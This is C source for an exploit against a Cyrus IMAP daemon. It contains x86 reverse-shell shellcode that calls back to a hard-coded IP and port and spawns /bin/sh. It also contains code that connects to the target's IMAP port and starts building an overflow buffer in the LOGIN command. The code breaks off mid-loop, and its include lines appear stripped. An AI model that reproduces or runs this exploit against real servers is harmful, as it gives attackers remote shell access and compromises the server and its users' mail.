/* exploit for cyrus imap-daemon 2.8.8 author b.stickler coauthor w.misar date 2004-11-30 */ /* disabled 2007-08-14 */ #include #include #include #include #include char shellcode[] = "\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb" "\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6" "\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff" "\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83" "\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24" "\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80" "\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80" "\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89" "\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89" "\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80" "\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e" "\x2f\x73\x68\x24"; int ip_offset = 40; int port_offset = 54; int ip_xor = 0xffffffff; void test_shellcode() { int (*f)(); f = (int(*)())shellcode; f(); } int main( int argc, char** argv ) { char* target_ip = "127.0.0.1"; int target_port = 143; int mysocket = 0; struct sockaddr_in target_addr; int ret_pos = 496; char buffer[4096]; char* ptr = buffer; int i = 0; // ip shellcode[ip_offset] = 192 ^ 0xFF; shellcode[ip_offset+1] = 168 ^ 0xFF; shellcode[ip_offset+2] = 10 ^ 0xFF; shellcode[ip_offset+3] = 7 ^ 0xFF; // port 33333 shellcode[port_offset] = 0x82; shellcode[port_offset+1] = 0x35; bzero( &target_addr, sizeof( target_addr ) ); target_addr.sin_family = AF_INET; inet_pton( AF_INET, target_ip, &target_addr.sin_addr ); target_addr.sin_port = htons( target_port ); mysocket = socket( AF_INET, SOCK_STREAM, 6 ); // 6 = tcp; if( connect( mysocket, (struct sockaddr*)&target_addr, sizeof(target_addr) ) == -1 ) { fprintf( stderr, "error: couldn't connect to %s\n", target_ip ); return -1; } memset( buffer, 0, sizeof(buffer) ); memcpy( ptr, "a01 login ", 10 ); ptr += 10; for( i=0; i